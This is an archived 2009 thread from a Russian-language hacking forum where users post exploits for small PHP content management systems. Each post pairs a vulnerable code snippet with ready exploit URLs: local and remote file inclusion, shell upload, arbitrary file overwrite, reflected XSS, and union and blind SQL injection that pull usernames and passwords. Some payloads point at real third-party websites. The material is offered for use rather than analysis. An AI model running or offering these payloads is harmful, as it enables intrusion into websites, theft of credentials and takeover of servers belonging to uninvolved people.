ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.10.2009, 16:59
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
MultiEngine CMS 0.9.4
LFI
PoC: http://site.ru/?mod=.../.../.../.../.../.../.../etc/passwd
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
16.10.2009, 19:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
MixedCMS_10
LFI
PHP код:
$mod = $_REQUEST['mod'];
$op = $_REQUEST['op'];
$isadmin = $_REQUEST['isadmin'];
include "../engine/db.config.php";
include "./mod/".$mod."/".$mod."_admin.php";
http://site.com/modules/mod.php?mod='%00
там есть аплоад
Аплодим шелл
Файл download_admin.php
PHP код:
include "./mod/download/download_config.php";
...
<td align=\"center\"><a href=\"mod.php?mod=download&op=add&isadmin=1\"><b>Add Download</b></a></td>
<td align=\"center\"> <!--<a href=\"mod.php?mod=download\"><b>Download Page</b></a>--></td>
...
if (!@copy($url, $gal_path."/".$url))
{
disp_error($url." failed to copy");
}
unlink($url);
...
download_config.php
PHP код:
$gal_path = './mod/download/archieves';
по этому куску кода видно mod.php?mod=download&op=add&isadmin=1\" Add Download
значит надо его грузить
http://site.com/modules/mod.php?mod=download&op=add&isadmin=1
затем загружаем шелл и получаем его по адресу modules/mod/download/archieves/shell.php
PS гуглом и поиском проверил вроде нету такой
Последний раз редактировалось HAXTA4OK; 16.10.2009 в 19:15..
|
|
|
|
24.10.2009, 15:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
OneFileCMS
Обход авторизацаии
На серваке, в общем /tmp
Создаем сесию, например:
sess_blablabla
Код:
onefilecms_valid|s:1:"1";
chmod 777 sess_blablabla
Вставляем куку в браузер:
И используем багу чтобы прочитать пароли:
http://host/onefile/onefilecms.php?f= onefilecms.php
File upload:
http://host/onefile/onefilecms.php?p=upload&i=new/
__________________
BlackHat. MoDL
|
|
|
|
25.10.2009, 11:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
ShopOS
2.4.2
не знаю как назвать  типа
PHP код:
...
$filename = $_GET['f'];
...
$fp = fopen($filename, 'w');
fwrite($fp, $content);
fclose($fp);
http://site/google_sitemap.php?f=index.php
в итоге у нас файл index.php примет код
PHP код:
<?xml version='1.0' encoding='UTF-8'?>
<urlset xmlns="http://www..com/schemas/sitemap/0.84"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www..com/schemas/sitemap/0.84
http://www.google.com/schemas/sitemap/0.84/sitemap.xsd">
<url>
<loc>http://127.0.0.1/upload444/index.php?cat=1</loc>
<priority>1.0</priority>
<lastmod>2010-01-01T01:01:01+03:00</lastmod>
<changefreq>weekly</changefreq>
</url>
....
__http://www.vale4ka.org.ua/google_sitemap.php?f=ir.php
__http://www.vale4ka.org.ua/ir.php
Код:
Parse error: syntax error, unexpected T_STRING in /var/www/ir.php on line 1
в 2.4.3
это файл xml_sitemap.php
Последний раз редактировалось HAXTA4OK; 25.10.2009 в 11:36..
|
|
|
|
25.10.2009, 23:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
ClipShare вроде 4.0
Пассивная XSS 
/tags/123%22%3E%3Cscript%3Ealert(/XSS/);%3C/script%3E
/search/?search_id=%22%3E%3Cscript%3Ealert(/XSS/);%3C/script%3E&search_type=search_videos&x=0&y=0
|
|
|
|
28.10.2009, 14:42
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
iGamingCMS1.5
SQL
Файл reviews.php
PHP код:
$review = $db->Execute(" SELECT * FROM `sp_reviews` WHERE sp_reviews.id = '{$_REQUEST}';");
__http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13+--+
_http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,concat_ws(0x3a,PSEUDO,pass),3, 4,5,6,7,8,9,10,11,12,13+from+sp_members+--+
ЗЫ префикс у них sp_
Blind-sql
Файл gamedetails.php
PHP код:
$result = $db->Execute("SELECT * FROM `sp_games` WHERE `id` = '$_REQUEST' LIMIT 1");
__http://www.patches-scrolls.info/gamedetails.php?id=1+and+substring(version(),1,1)= 5
PS там еще есть фалики с типа таким же запросом
RFI/shell
в админке Файл loadplugin.php
PHP код:
require_once("$_REQUEST");
необходимо
allow_url_include = on
MQ= off
http://127.0.0.1/iGamingCMS1.5/admin/loadplugin.php?load=http://shell.txt?
2) способ залития шелла
Файл template_editor.php
PHP код:
if ($myfilehandle=@fopen('../templates/' . $_REQUEST,'w')) { if (get_magic_quotes_gpc()) { $editbuffer = stripslashes($editbuffer); } fputs($myfilehandle,$editbuffer); fclose($myfilehandle); echo "Saved OK";
по сути
http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php
там дается на выбор файлы из папки templates, но помоему нам ни чего не мешает выйти)из нее
http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php?filename=../index.php
(ну или в один из инклудившихся файлов писать код)
и в дальнейшем пишем пыщ пыщ код))) или тупо код шелла
Последний раз редактировалось HAXTA4OK; 29.10.2009 в 23:19..
|
|
|
|
30.10.2009, 09:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
PHMe
LFI
файл www.php
PHP код:
$currentFile = 'www.php'; require_once('con-fig/site_info.php'); require_once('con-fig/theme_info.php'); require_once("themes/{$Tdir}/top.php"); require_once('resources/function_list.php'); require_once("themes/{$Tdir}/bottom.php");
Файл resources/function_list.php
PHP код:
require('resources/mod/'.$_GET.'.php');
http://localhost/phme/www.php?action=../../admin~/untitled
|
|
|
|
30.10.2009, 21:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
iXon CMS
SQL
Уже по ходу любимый файл Rss.php
PHP код:
...
$id = $_GET['id'];
$post_data = get_all_post_data($id);
..
$result = mysql_query("SELECT * FROM comments WHERE post_id = $id ORDER BY comment_date ASC"); while ($comments = mysql_fetch_array($result))
...?>
http://localhost/iXon_CMS%200.30%20Beta/rss.php?id=1+union+select+1,2,3,4,5,6,7,unhex(hex( version())),9,10--
ну и вроде в инете видел что было выложено LFI
банальное раскрытие путей как с htmlspecialchars
PHP код:
$redirect = 'login-control.php?redirect_to='.urlencode($_GET);
http://localhost/iXon_CMS%200.30%20Beta/ixon-admin/login.php?redirect_to[]=
urlencode() expects parameter 1 to be string, array given in C:\AppServ\www\iXon_CMS 0.30 Beta\ixon-admin\login.php on line 35
Последний раз редактировалось HAXTA4OK; 30.10.2009 в 21:45..
|
|
|
|
31.10.2009, 06:33
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
The Hablator chat
Раскрытие путей
В Cookies
|
|
|
|
13.11.2009, 04:09
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
webSPELL CMS v4.0 Blind SQL injection
Уязвимость затаилась в скрипте профиля (profile.php):
PHP код:
...
if($_GET['id']) {
$id = strip_tags($_GET['id']);
//profil: buddys
if($_GET['action'] == "buddys") {
eval ("\$title_profile = \"".gettemplate("title_profile")."\";");
echo $title_profile;
$buddys=safe_query("SELECT buddy FROM ".PREFIX."buddys WHERE userID='$id'");
...
Единственной попыткой защитить свое "детище" программисты сделали фильтрацию пережаваемого ГОТом значния с помощю функции strip_tags(), которая как известно удаляет HTML и PHP теги из строки.
Реализация:
Код:
http://localhost/1/index.php?site=profile&id=1'+and+substring(version(),1,1)=5+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),1,1)))=114+and+'1'='1
Код:
http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),2,1)))=111+and+'1'='1
И так далее.
Для удачной эксплаьации magic_quotes_gpc должно быть в положении off
|
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
